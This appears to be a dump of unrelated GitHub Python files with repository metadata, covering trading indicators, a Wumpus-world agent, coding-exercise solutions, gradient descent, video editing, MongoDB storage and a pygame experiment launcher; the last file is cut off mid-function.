f'Std Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistMax_{channel_id}'] = f'Max Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct05_{channel_id}'] = f'5th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct25_{channel_id}'] = f'25th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct50_{channel_id}'] = f'Median Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct75_{channel_id}'] = f'75th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct95_{channel_id}'] = f'95th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistNumNear_{channel_id}'] = f'Number of Near {channel_name} Objects'\n ylabels[f'DistNumFar_{channel_id}'] = f'Number of Far {channel_name} Objects'\n\n # Intensity Analysis\n for key, value in param_names.items():\n ylabels[f'Intensity{key}_{channel_id}'] = f'{channel_name} {value} Intensity (AU)'\n ylabels[f'IntensityShell{key}_{channel_id}'] = f'{channel_name} {value} Shell Intensity (AU)'\n ylabels[f'IntensityCore{key}_{channel_id}'] = f'{channel_name} {value} Core Intensity (AU)'\n\n ylabels[f'NormIntensity{key}_{channel_id}'] = f'Normalized {channel_name} {value} Intensity (AU)'\n ylabels[f'NormIntensityShell{key}_{channel_id}'] = f'Normalized {channel_name} {value} Shell Intensity (AU)'\n ylabels[f'NormIntensityCore{key}_{channel_id}'] = f'Normalized {channel_name} {value} Core Intensity (AU)'\n return ylabels\n","repo_name":"denalitherapeutics/Lengerich_natneuro_2022","sub_path":"morphology/atv_trem2_morpho/qc_utils.py","file_name":"qc_utils.py","file_ext":"py","file_size_in_byte":35564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36886762787","text":"import pandas as pd\nimport numpy as np\nfrom binance import Client\n\ndef get_klines(client, symbol, timeframe, start, end=None):\n df = pd.DataFrame(client.get_historical_klines(symbol,\n timeframe,\n start,\n end))\n df = df[[0,1,2,3,4,5]]\n df.columns = [\"Date\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\"]\n df.Date = pd.to_datetime(df.Date, unit=\"ms\")\n df.set_index(\"Date\", inplace=True)\n df = df.astype(float)\n return df\n\ndef bollinger_bands(prices, n, stds, upper=True):\n # Convert the prices into a pandas dataframe\n df = pd.DataFrame(prices, columns=['prices'])\n\n # Calculate the moving average and standard deviation of the prices\n df['moving_average'] = df['prices'].rolling(n).mean()\n df['standard_deviation'] = df['prices'].rolling(n).std()\n\n # Calculate the upper and lower bands\n df['upper_band'] = df['moving_average'] + stds * df['standard_deviation']\n df['lower_band'] = df['moving_average'] - stds * df['standard_deviation']\n\n # Return the moving average, upper band, and lower band\n if upper:\n return df[\"upper_band\"]\n else:\n return df[\"lower_band\"]\n \n\n\ndef bollinger_bands_numpy(prices, n, stds):\n # Calculate the moving average of the prices\n moving_average = np.mean(prices[-n:])\n\n # Calculate the standard deviation of the prices\n standard_deviation = np.std(prices[-n:])\n\n # Calculate the upper band\n upper_band = moving_average + stds * standard_deviation\n\n # Calculate the lower band\n lower_band = moving_average - stds * standard_deviation\n\n return upper_band, lower_band\n\n\ndef bollinger_bands(data, window_size, num_std_dev):\n \n # Calculate the moving average\n moving_avg = np.mean(data[-window_size:])\n\n # Calculate the standard deviation\n std_dev = np.std(data[-window_size:])\n\n # Calculate the lower Bollinger band\n lower_band = moving_avg - num_std_dev * std_dev\n\n # Calculate the upper Bollinger band\n upper_band = moving_avg + num_std_dev * std_dev\n\n return (lower_band, moving_avg, upper_band)\n\n\ndef rolling_bollinger_bands(data, window_size, num_std_dev, upper):\n \"\"\"Calculates rolling Bollinger bands for given data.\n\n Parameters:\n data (numpy array): An array of values for which to calculate Bollinger bands.\n window_size (int): The size of the rolling window used to calculate the moving average and standard deviation.\n num_std_dev (int): The number of standard deviations to use as the width of the Bollinger bands.\n\n Returns:\n tuple: A tuple containing the lower Bollinger band, moving average, and upper Bollinger band for each window of data.\n \"\"\"\n # Initialize lists to store the Bollinger bands\n lower_bands = []\n moving_avgs = []\n upper_bands = []\n\n # Iterate over the data and calculate the Bollinger bands for each window\n for i in range(len(data)):\n window = data[max(0, i-window_size+1):i+1]\n\n # Calculate the Bollinger bands for the current window\n if len(window) >= window_size:\n # Calculate the moving average\n moving_avg = np.mean(window)\n\n # Calculate the standard deviation\n std_dev = np.std(window)\n\n # Calculate the lower Bollinger band\n lower_band = moving_avg - num_std_dev * std_dev\n\n # Calculate the upper Bollinger band\n upper_band = moving_avg + num_std_dev * std_dev\n else:\n # Use np.nan for values where the window is not large enough\n moving_avg = np.nan\n lower_band = np.nan\n upper_band = np.nan\n\n # Append the Bollinger bands to the lists\n lower_bands.append(lower_band)\n moving_avgs.append(moving_avg)\n upper_bands.append(upper_band)\n \n if upper==\"upper\":\n return upper_bands\n elif upper == \"average\":\n return moving_avgs\n else:\n return lower_bands","repo_name":"lazaros-23/thieftbot","sub_path":"backtesting/backtesting_helpers.py","file_name":"backtesting_helpers.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"732113690","text":"import pygame as pg\nfrom Source import *\n\nclass vertex:\n def __init__(self,u,c):\n self.u = u\n self.available = []\n self.cost = c\n def able(self,can):\n self.available.append(can)\n\n#양방향이라서 이미 지나온 자리를 제거해야한다.\ngraph = []\n\nfor i in range(16):\n temp = vertex(i+1,10)\n a = i+1\n if a-1 > 0 and (a-1)%4 !=0:\n temp.able(a-1)\n if a%4 != 0:\n temp.able(a+1)\n if a+4 < 16:\n temp.able(a+4)\n if a-4 > 0:\n temp.able(a-4)\n graph.append(temp)\n#for i in graph:\n# print(i.available)\ntemp = graph[2]\ntemp.cost = 1500\ngraph[2] = temp\n#2+1\n\ntemp = graph[9]\ntemp.cost = 1000\ngraph[9] = temp\n#9+1\n\ntemp = graph[13]\ntemp.cost = 1\ngraph[13] = temp\n#13+1\n\nclass Wumpus(pg.sprite.Sprite):\n def __init__(self):\n super(Wumpus,self).__init__()\n size = (50,50)\n self.pos = (240,70)\n images = []\n images.append(pg.image.load('04.png'))\n self.rect = pg.Rect(self.pos,size)\n self.images = [pg.transform.scale(image,size)for image in images]\n self.image = images[0]\n def update(self):\n self.image = self.images[0]\nclass Monster(pg.sprite.Sprite):\n def __init__(self):\n super(Monster,self).__init__()\n size = (50,50)\n self.pos = (190,170)\n images = []\n images.append(pg.image.load('04.png'))\n self.rect = pg.Rect(self.pos,size)\n self.images = [pg.transform.scale(image,size)for image in images]\n self.image = images[0]\n def update(self):\n self.image = self.images[0]\nclass Gold(pg.sprite.Sprite):\n def __init__(self):\n super(Gold,self).__init__()\n size = (50,50)\n self.pos = (190,220)\n images = []\n images.append(pg.image.load('05.png'))\n self.rect = pg.Rect(self.pos,size)\n self.images = [pg.transform.scale(image,size)for image in images]\n self.image = images[0]\n def update(self):\n self.image = self.images[0]\nclass wall(pg.sprite.Sprite):\n def __init__(self):\n super(wall,self).__init__()\n size = (200,200)\n self.pos = zero_pos\n self.index = 0\n images = []\n images.append(pg.image.load('02.png'))\n self.rect = pg.Rect(self.pos,size)\n self.images = [pg.transform.scale(image,size)for image in images]\n self.image = images[self.index]\n def update(self):\n self.index += 1\n if self.index >= len(self.images):\n self.index = 0\n self.image = self.images[self.index]\n#그래프 집어넣기\nclass Agentshow(pg.sprite.Sprite):\n def __init__(self):\n super(Agentshow,self).__init__()\n self.position = zero_pos\n self.size = (50,50)\n images = []\n images.append(pg.image.load('01.png'))\n images.append(pg.image.load('03.png'))\n self.rect = pg.Rect(self.position,self.size)\n self.images = [pg.transform.scale(image,self.size)for image in images]\n self.index = 0\n self.image = images[self.index]\n def update(self,now):\n self.position = now\n if now == (140,70):\n self.index = 1\n self.image = self.images[self.index]\n self.rect = pg.Rect(zero_pos,self.size)\n else:\n self.index = 0\n self.rect = pg.Rect(self.position,self.size)\n self.image = self.images[self.index]\n if self.index >= len(self.images):\n self.index = 0\n \n \nclass Traveler():\n def __init__(self,start,g):\n self.superroute = []\n self.g = g\n self.life = True\n self.target = False\n self.travel = [start]\n self.trace = []\n self.monster = []\n self.wumpus = []\n self.gold = []\n self.now = start\n \n def travelroute(self):\n if self.target == True:\n if self.trace in self.superroute:\n return\n else:\n self.superroute.append(self.trace)\n return\n else:\n self.travel.remove(self.now)\n self.trace.append(self.now)\n print('now:',self.now.u)\n self.deadcheck(self.now.cost)\n self.targetcheck(self.now.cost)\n if self.life == False:\n self.superroute.append(self.trace)\n self.now = self.g[0]\n self.travel = [self.g[0]]\n self.trace = []\n self.life = True\n self.travelroute()\n for i in self.now.available:\n real = i-1\n self.travel.append(self.g[real])\n for j in self.trace:\n if j in self.travel:\n self.travel.remove(j)\n for k in self.monster:\n if k in self.travel:\n self.travel.remove(k)\n for k in self.wumpus:\n if k in self.travel:\n self.travel.remove(k)\n \n if self.now != self.g[15] and self.travel != []:\n self.now = self.travel[0]\n self.travelroute()\n return\n \n def deadcheck(self,c):\n if c >= 1000:\n self.life = False\n if c == 1000:\n self.wumpus.append(self.now)\n if c == 1500:\n self.monster.append(self.now)\n print('traveler is dead.')\n \n def targetcheck(self,c):\n if c == 1:\n self.target = True\n self.gold.append(self.now)\n print('found the target.')","repo_name":"CaptCore/2023_Spring_CUK","sub_path":"Agent/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9275513341","text":"N = int(input())\nn = set(map(int, input().split()))\nprint(n)\nM = int(input())\nM_list = list(map(int, input().split()))\n\ncard.sort()\n\ndef BinarySearch(card, target, start, end,):\n while(start <= end):\n mid = (start + end) // 2\n\n if(card[mid] == target):\n return True\n elif(card[mid] > target):\n end = mid - 1\n else:\n start = mid + 1\n\n return False\n\nfor i in M_list:\n if BinarySearch(card, i, 0, N-1):\n print(1, end = ' ')\n else: print(0, end = ' ')","repo_name":"gaeonee/Ct","sub_path":"Baekjoon/Search/10815_숫자카드.py","file_name":"10815_숫자카드.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35649435515","text":"hour_of_the_exam = int(input())\r\nminute_of_the_exam = int(input())\r\nhour_of_arrival = int(input())\r\nminute_of_arrival = int(input())\r\n\r\nhours = 0\r\nminutes = 0\r\nexam_time = minute_of_the_exam + hour_of_the_exam * 60\r\narrival_time = minute_of_arrival + hour_of_arrival * 60\r\ndifference = exam_time - arrival_time\r\n\r\nif difference < 0:\r\n print(\"Late\")\r\n difference = abs(difference)\r\n if difference >= 60:\r\n hours = difference // 60\r\n minutes = difference % 60\r\n print(f\"{hours}:{minutes:02d} hours after the start\")\r\n else:\r\n print(f\"{difference} minutes after the start\")\r\nelif 0 <= difference <= 30:\r\n print(\"On time\")\r\n if difference > 0:\r\n print(f'{difference} minutes before the start')\r\nelif difference > 30:\r\n print(\"Early\")\r\n if difference >= 60:\r\n hours = difference // 60\r\n minutes = difference % 60\r\n print(f\"{hours}:{minutes:02d} hours before the start\")\r\n else:\r\n print(f\"{difference} minutes before the start\")\r\n","repo_name":"inovei6un/first_steps","sub_path":"harder_if_conditions_part_2/on_time_for_the_exam.py","file_name":"on_time_for_the_exam.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25636459268","text":"from __future__ import print_function\n\nimport sys\n\nimport numpy as np\nfrom numpy import *\nfrom scipy import stats\n\n# This is an implementation of Gradient Descent in python and numpy\n# Data set of this example\n\n\ndef isfloat(value):\n\ttry:\n\t\tfloat(value)\n\t\treturn True\n\texcept:\n \treturn False\n\n\n\ndef readData(fileName, lowFilter, highFilter):\n\n\tx=[]\n\ty=[]\n\twith open(fileName) as f:\n\t\tfor i in f:\n\t\t\ta=i.split(\",\")\n\t\t\tif(len(a)==17):\n\t\t\t\tif(isfloat(a[5]) and isfloat(a[11])):\n\t\t\t\t\tif(float(a[5])!=0 and float(a[11])!=0):\n\t\t\t\t\t\tif(float(a[11])> lowFilter and float(a[11]) < highFilter):\n\t\t\t\t\t\t\tx.append(float(a[5]))\n\t\t\t\t\t\t\ty.append(float(a[11]))\n\n\tax=np.array(x)\n\tay=np.array(y)\n\treturn np.vstack((ax, ay))\n\n\n\ndef gradient_descent_run(points, m_current, b_current, learningRate, num_iteration, precision):\n\t# m is the beta1\n\t# b is the beta 0 or Y-Intercept\n\tX=points[0]\n\tY=points[1]\n\tprevious_step_size=1\n\n\tN = float(len(Y))\n\titers=0\n\tcost = 9999999999999999\n\n\twhile (previous_step_size > precision and iters < num_iteration):\n\t\ty_current = (m_current * X) + b_current\n\t\tm_prev = m_current\n\n\t\tm_gradient = -(2/N) * sum(X * (Y - y_current))\n\t\tb_gradient = -(2/N) * sum(Y - y_current)\n\t\tnew_learingRate = learningRate\n# in 1100 iteration\n# but more costly due to cost funtion calculation\n#\n#\t\told_cost = cost\n#\t\tcost = sum([data**2 for data in (Y - y_current)]) / N\n#\t\tif(costold_cost):\n#\t\t\tnew_learingRate=learningRate*0.5\n\n\n\t\tm_current = m_current - (new_learingRate * m_gradient)\n\t\tb_current = b_current - (new_learingRate * b_gradient)\n\n\t\tprevious_step_size = abs(m_current - m_prev)\n\t\titers = iters+1\n\t\tif(iters%100==0):\n\t\t\tprint(\"Iteration: \", iters,\" Beta0 : \", \"{0:.10f}\".format(b_current) , \" Beta1 : \", \"{0:.10f}\".format(m_current) )\n\n\n\treturn m_current, b_current\n\n\n\n\n\n\n\ndef run(fileName):\n\n\tpoints = readData(fileName, 5., 100.)\n# numerical Solution\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(points[0],points[1])\n\tprint(\"slope: \", slope)\n\tprint(\"intercept: \", intercept)\n\n\n# Gradient Descent\n\tstarting_b=0\n\tstarting_m=0\n\n\tlearningRate=0.00001\n\tnum_iteration=10000000\n\tprecision = 0.00000001\n\n\t[m, b] = gradient_descent_run(points, starting_b, starting_m, learningRate, num_iteration, precision)\n\n\tprint(\"======== Final Results ==============\")\n\tprint(\"Data after filter: \", points.shape)\n\tprint(\"Beta0: \", b)\n\tprint(\"Beta1: \", m)\n\n\nif __name__ == \"__main__\":\n\trun(sys.argv[1])\n\n\n\n# learning Rate = 0.01\n# Iteration: 1200 Beta0 : 4.3509580481 Beta1 : 2.6376461370\n# ======== Final Results ==============\n# Data after filter: (2, 1718496)\n# Beta0: 4.350962228020886\n# Beta1: 2.6376455350280423\n\n\n\n# # learning Rate = 0.001\n# Iteration: 10300 Beta0 : 4.3509000498 Beta1 : 2.6376544897\n# ======== Final Results ==============\n# Data after filter: (2, 1718496)\n# Beta0: 4.350903391574003\n# Beta1: 2.6376540084537377\n\n\n# Doing the same linear Regression with R\n# R Results\n# taxi <- read.csv(\"/home/kia/Desktop/taxi-data-sorted-small.csv\" , header = F)\n# taxi <-taxi[ which(taxi$V6 != 0 & taxi$V12 != 0 & taxi$V12 > 5 & taxi$V12 < 100), ]\n# lm(taxi$V12~taxi$V6)\n\n# Coefficients:\n# (Intercept) taxi$V6\n# 4.351 2.638\n","repo_name":"kiat/BigDataAnalytics","sub_path":"Python_examples/GradientDesent_python.py","file_name":"GradientDesent_python.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"32"} +{"seq_id":"4373445736","text":"from moviepy.editor import VideoFileClip\nimport moviepy.video.fx.all as vfx\n\n\ndef video_speed(in_loc, out_loc, speed_factor):\n # Import video clip\n clip = VideoFileClip(in_loc)\n print(\"fps: {}\".format(clip.fps))\n\n # Modify the FPS\n clip = clip.set_fps(clip.fps * int(speed_factor))\n\n # Apply speed up\n final = clip.fx(vfx.speedx, int(speed_factor))\n print(\"fps: {}\".format(final.fps))\n\n print(out_loc)\n # Save video clip\n final.write_videofile(out_loc)","repo_name":"Mima-Dozh/video-editor","sub_path":"video_speed.py","file_name":"video_speed.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25201720301","text":"import pymongo\nimport eel\nfrom bson.binary import Binary\nimport pickle\nimport configparser\n\n# create a database connection\ndef connectToDB():\n print(\"connecting to database\")\n \n config = configparser.ConfigParser()\n config.read('DB.ini')\n \n \n myclient = pymongo.MongoClient(config['database']['dbserver'])\n mydb = myclient[config['database']['db']]\n global DBCollection\n DBCollection= mydb[config['database']['dbcollection']]\n\n\n\n# inser record into database\ndef insertRecordToDB(student):\n print(\"inserting record\")\n try:\n id = DBCollection.insert_one(student).inserted_id\n except pymongo.errors.DuplicateKeyError as e:\n print(e)\n message=\"we could not insert your record\"\n eel.errorMessage(message)\n return None\n message=\"student added to database\"\n eel.successMessage(message)\n\n return id\n\n\n# get all encodings from DB\ndef queryAllEncodingsFromDB():\n students=list(DBCollection.find({},{\"_id\":1, \"Encoding\":1}))\n print(students)\n encodingsList=[]\n encodingIdList=[]\n for st in students:\n\n npArrayEncoding=pickle.loads(st[\"Encoding\"])\n encodingsList.append(npArrayEncoding)\n encodingIdList.append(st[\"_id\"])\n\n return encodingsList,encodingIdList\n\ndef queryOneRecordFromDB(name):\n # the name should be an ID , get more details from database\n myquery = {\"_id\": name}\n student = DBCollection.find_one(myquery)\n return student\n","repo_name":"munabedan/Reco","sub_path":"DB.py","file_name":"DB.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74344660890","text":"# From https://code.google.com/p/agpy/source/browse/trunk/agpy/posang.py\n# now at\n# https://github.com/keflavich/agpy/tree/master/agpy\n# Changes by Bryan Miller:\n# 2014jul22 - default system=radec\n# 2014jul22 - changed to ra2-ra1 so that sign matches posang.pro\n# RA1 = 66.15593384\n# DC1 = 33.95988843\n# RA2 = 66.15646079\n# DC2 = 33.96100069\n# print posang.posang(RA1,DC1,RA2,DC2)\n# 21.4522920312\n\nfrom astropy.coordinates import SkyCoord\nfrom numpy import pi,arctan2,sin,cos,tan\n# from astropy import units as u\n\ndef posang(l1,b1,l2,b2,system='radec',units='degrees',**kwargs):\n \"\"\"\n Return the position angle between two points assuming a rectilinear\n coordinate system (I think; at the very least I am making no corrections\n for wcs).\n\n INPUT:\n longitude1, latitude1, longitude2, latitude2\n\n \"\"\"\n\n if system.lower() == 'galactic':\n pos1 = SkyCoord(l1,b1,unit=('deg','deg'),frame='galactic')\n pos2 = SkyCoord(l2,b2,unit=('deg','deg'),frame='galactic')\n elif system.lower() in ('radec','fk5','icrs'):\n pos1 = SkyCoord(l1,b1,unit=('deg','deg'),frame='icrs')\n pos2 = SkyCoord(l2,b2,unit=('deg','deg'),frame='icrs')\n\n ra1,dec1 = pos1.icrs.ra.deg,pos1.icrs.dec.deg\n ra2,dec2 = pos2.icrs.ra.deg,pos2.icrs.dec.deg\n\n radiff = (ra2-ra1)/180.*pi\n\n angle = arctan2( sin(radiff) , cos(dec1*pi/180.)*tan(dec2*pi/180.) - sin(dec1*pi/180.)*cos(radiff) ) \n\n if units == 'degrees':\n return angle/pi*180.\n elif units == 'radians':\n return angle\n else:\n raise ValueError(\"Invalid units: %s\" % units)\n\nif __name__ == \"__main__\":\n\n RA1 = 66.15593384\n DC1 = 33.95988843\n RA2 = 66.15646079\n DC2 = 33.96100069\n print (posang(RA1,DC1,RA2,DC2))\n assert posang(RA1,DC1,RA2,DC2), 21.4522920312\n\n print (posang(RA1,DC1,RA2,DC2,system='galactic'))\n\n","repo_name":"bryanmiller/bwm_utils","sub_path":"posang.py","file_name":"posang.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24918433708","text":"\"\"\"Test optimization\"\"\"\n\nfrom pathlib import Path\n\nimport pytest\nimport numpy as np\n\nfrom bitwise_challenge_2022_2.network import BaseNetwork, NetworkGraph\nfrom bitwise_challenge_2022_2.optimize import _create_feasible_solutions\n\n\n@pytest.fixture(name=\"network_json\")\ndef network_json_fx() -> Path:\n \"\"\"Return path to challenge json\"\"\"\n return (\n Path(__file__).parents[1]\n / \"bitwise_challenge_2022_2\"\n / \"koodipahkina-data.json\"\n )\n\n\ndef test_create_feasible_solutions(network_json: Path):\n \"\"\"Solution vectors represent feasible solutions\"\"\"\n\n rng = np.random.default_rng()\n count = 7\n x_created = _create_feasible_solutions(network_json, rng, count)\n x_bool = x_created.astype(bool)\n\n assert len(x_created) == count\n\n base_network = BaseNetwork.from_json(network_json)\n base_matrix = base_network.to_adjacency_matrix()\n edges = base_network.get_edge_matrix()\n\n for i in range(count):\n new_net = NetworkGraph(base_matrix)\n new_net.remove_edges(edges[~x_bool[i]])\n assert new_net.is_connected\n","repo_name":"mkouhia/bitwise-challenge-2022-2","sub_path":"tests/test_optimize.py","file_name":"test_optimize.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26701169423","text":"import threading\nimport logging\nimport pygame\nimport random\nimport acqui.tasks as tasks\nimport acqui.actions as actions\nimport acqui.clazz as clazz\nclass AcquiLauncher(threading.Thread):\n\t\"\"\"docstring for AcquiLauncher\"\"\"\n\tdef __init__(self,cnf,dataWriter):\n\t\tsuper(AcquiLauncher, self).__init__()\n\t\tself.logger=logging.getLogger(\"logger\")\n\t\tself.cnf=cnf\n\t\tself.dataWriter=dataWriter\n\t\tself.init_pygame()\n\t\tself.init_scheduler()\n\n\t\n\tdef init_pygame(self):\n\t\tself.logger.debug(\"Pygame init\")\n\t\tpygame.mixer.pre_init(frequency=44100, size=-16, channels=2, buffer=2048)\n\t\tpygame.init()\n\t\tsize = width,height =self.cnf['disp']['w'],self.cnf['disp']['h']\n\t\tself.screen = pygame.display.set_mode(size)\n\t\n\tdef init_scheduler(self):\n\t\tself.logger.debug(\"Scheduler init\")\n\t\t#inits\n\t\tself.schedulerRunning= tasks.Scheduler()\n\t\tself.schedulerStart= tasks.Scheduler()\n\t\tbg=actions.BackgroundAction((255,255,255),self.screen)\n\t\tcross=actions.CrossAction(\"imgs/cross.png\",self.screen)\n\t\tsnd=actions.SoundAction(self.cnf['snd'])\n\t\tpainters=[ clazz.ClazzPainter( self.screen,cl,140,[]) for cl in self.cnf['classes']]\n\t\tpool=clazz.RandomClassPool(painters,self.cnf['trials'])\n\t\tclazzAction=clazz.ClassAction(pool)\n\t\tdStart=actions.DataWriteStartAction(self.dataWriter)\n\t\tdStop=actions.DataWriteStopAction(self.dataWriter,pool)\n\t\t#idle\n\t\ttaskIdle=tasks.Task(duration_provider_factory(self.cnf['durations']['idle']))\n\t\ttaskIdle.addAction(bg)\n\t\tself.schedulerRunning.addTask(taskIdle)\n\t\t#show fix\n\t\ttaskFix=tasks.Task(duration_provider_factory( self.cnf['durations']['fixation'] ))\n\t\ttaskFix.addAction(bg)\n\t\ttaskFix.addAction(cross)\n\t\ttaskFix.addAction(snd)\n\t\ttaskFix.addAction(dStart)\n\t\tself.schedulerRunning.addTask(taskFix)\n\t\t#show class\n\t\ttaskClass=tasks.Task(duration_provider_factory( self.cnf['durations']['class']+300 ))\n\t\ttaskClass.addAction(bg)\n\t\ttaskClass.addAction(cross)\n\t\ttaskClass.addAction(dStop)\n\t\ttaskClass.addAction(clazzAction)\n\t\tself.schedulerRunning.addTask(taskClass)\n\n\t\t#Pause task\n\t\tmsg=actions.MessageAction(\"Press 'Any' key to start\",self.screen)\n\t\ttaskStart=tasks.Task(DurationProvider(500))\n\t\ttaskStart.addAction(bg)\n\t\ttaskStart.addAction(msg)\n\t\tself.schedulerStart.addTask(taskStart)\n\n\tdef run(self):\n\t\ttasks.Loop(self.schedulerRunning,self.schedulerStart).loop()\n\nclass DurationProvider(object):\n\t\"\"\"docstring for DurationProvider\"\"\"\n\tdef __init__(self,duration):\n\t\tsuper(DurationProvider, self).__init__()\n\t\tself.duration = duration\n\t\tself.logger=logging.getLogger(\"logger\")\n\n\tdef get(self):\n\t\treturn self.duration\t\n\t\n\nclass RangedDurationProvider(object):\n\t\"\"\"docstring for DurationProvider\"\"\"\n\tdef __init__(self,limits):\n\t\tsuper(RangedDurationProvider, self).__init__()\n\t\tself.logger=logging.getLogger(\"logger\")\n\t\tself.limits = limits\n\n\tdef get(self):\n\t\td=random.uniform(self.limits[0],self.limits[1])\n\t\tself.logger.debug(\"d %f\",d)\n\t\treturn d\n\ndef duration_provider_factory(duration):\n\t\"\"\"docstring for duration_provider_factory\"\"\"\n\tlogging.getLogger(\"logger\").debug(\"duration %s\"%duration.__class__.__name__)\n\tif type(duration) is tuple:\n\t\treturn RangedDurationProvider(duration)\n\telse:\n\t\treturn DurationProvider(duration)\n\ndef map_script(ch):\n\tif ch=='r':\n\t\treturn clazz.Clazz.RIGHT\n\tif ch=='l':\n\t\treturn clazz.Clazz.LEFT\n\tif ch=='u':\n\t\treturn clazz.Clazz.UP\n\tif ch=='d':\n\t\treturn clazz.Clazz.DOWN\n","repo_name":"capitancambio/brainz","sub_path":"brainz/acqui/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29108552650","text":"class Solution:\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n \"\"\"\n 解法一:\n 1.当strs为空时,返回空字符串\n 2.一次假设从0到len(strs[0]),在每一轮循环中:\n 1.如果strs中存在string比当前长度i还小,那么返回strs[0][:i]\n 2.如果strs存在index字符与LCP字符不同,则返回上一个LCP,返回strs[0][:i]\n \"\"\"\n if not strs:\n return ''\n for i in range(len(strs[0])):\n for str in strs:\n if len(str)<=i or strs[0][i] != str[i]:\n return strs[0][:i]\n return str[0]\n\n \"\"\"\n 解法二:创建一个len(strs)大小的列表,里面全是strs[0]\n 然后i从1到len(strs),如果strs[i]不以strs[0]为前缀,那么strs[0]删掉最后一位\n\n\n \"\"\"\n # if not strs:\n # return ''\n # dp = [strs[0]] * len(strs)\n # for i in range(1,len(strs)):\n # while not strs[i].startswith(dp[i-1]):\n # dp[i-1] = dp[i-1][:-1]\n # dp[i] = dp[i-1]\n # return dp[-1]\n\n \"\"\"\n 解法三:\n os.path.commonprefix()\n \"\"\"\n import os\n return os.path.commonprefix(strs)\n\n\nif __name__ == \"__main__\":\n\n strs = ['flower','flow','flight']\n strs1 = [\"dog\",\"racecar\",\"car\"]\n solution = Solution()\n result = solution.longestCommonPrefix(strs)\n # result = solution.longestCommonPrefix(strs1)\n\n print(result)\n","repo_name":"lxb1226/Leetcodeforpython","sub_path":"简单/14-longgestCommonPrefix.py","file_name":"14-longgestCommonPrefix.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31988681761","text":"\n# concat:out:a0 -> Stream #0:1 (aac)\n# Press [q] to stop, [?] for help\n# frame= 0 fps=0.0 q=0.0 size= 0kB time=-577014:32:22.77 bitrate= -0.0kbits/s speed=N/A \n# [Parsed_concat_0 @ 00000128d3174f80] Input link in1:v0 parameters (size 1334x750, SAR 1:1) do not match the corresponding output link in0:v0 parameters (360x640, SAR 1:1)\n# [Parsed_concat_0 @ 00000128d3174f80] Failed to configure output pad on Parsed_concat_0\n# Error reinitializing filters!\n# Failed to inject frame into filter network: Invalid argument\n# Error while processing the decoded data for stream #42:0\n# Conversion failed!\n\n\n\n\n\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nfrom threading import Thread\n\n# \nimport subprocess\nimport cv2\nimport time\n# \nimport file_system_utils\nimport project_vars_handler\nimport vid_edit_utils\n\n\n# VIDS_TO_COMPILE_FOLDER_PATH = 'vids_to_compile'\nCLIPS_TO_COMPILE_DIR_PATH = project_vars_handler.get_var('current_data_dir_path') + '/clips_to_compile'\nMAX_CMD_CHARS = 8191\n# OUTPUT_VID_DIMS = [1080, 720, 480, 360, 240, 144] # other heights can work, but not all, so stick to these because they're safe\n \n# w h \nOUTPUT_VID_DIMS_L =[(3840,2160),\n (2560,1440),\n (1920,1080),\n (1280, 720),\n (854, 480),\n (640, 360),\n (426, 240)]\n\nVID_CONCAT_FILE_PATH = 'concat_filepaths.txt'\n# OUTPUT_VID_FILE_PATH = 'output.mp4'\n\n\n\ndef write_text_file(file_path, line_list):\n f = open(file_path, 'w', encoding='utf-8')\n # write to file\n for line in line_list:\n f.write(line + '\\n')\n # cleanup\n f.close()\n \n## do not delete until done with many full tests !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \n# # make sure everyone ends with .mp4\n# def clean_up_vid_extentions():\n# vid_filename_list = os.listdir(VIDS_TO_COMPILE_FOLDER_PATH)\n# \n# for vid_filename in vid_filename_list:\n# split_vid_filename = vid_filename.split('.')\n# if split_vid_filename[-1] != 'mp4':\n# new_vid_filename = split_vid_filename[0] + '.mp4'\n# os.rename(VIDS_TO_COMPILE_FOLDER_PATH + '/' + vid_filename, VIDS_TO_COMPILE_FOLDER_PATH + '/' + new_vid_filename)\n \n \n# dont delete until you have done a LOT of testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# def get_height_of_vid(vid_file_path):\n# vid = 